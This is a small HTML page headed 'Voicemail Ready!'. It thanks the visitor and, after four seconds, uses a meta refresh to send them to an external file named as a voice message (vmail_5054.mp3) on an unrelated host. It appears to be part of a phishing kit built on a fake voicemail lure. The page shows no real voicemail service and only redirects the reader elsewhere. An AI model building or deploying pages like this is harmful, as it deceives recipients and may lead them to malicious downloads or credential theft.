<!DOCTYPE html>
<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
		<link type="text/css" rel="stylesheet" href="">
		<link rel="shortcut icon" href="">
		<title>Voicemail Ready!</title>
	</head>
	<body style="font-family:arial; font-weight:normal;">
		<center>
			<br>
			<img src="https://media1.tenor.com/images/db85ba00c6073b451a8f05156a66524e/tenor.gif?itemid=9856796">
			<br>
			<h1>Thank you</h1>
			<p><img src="" alt=""></p>
			<p>Please wait while we redirect you to your voice message</p>
		</center>
<meta http-equiv="refresh" content="4; url=http://arg.cl/vmail_5054.mp3" />
	

</body></html>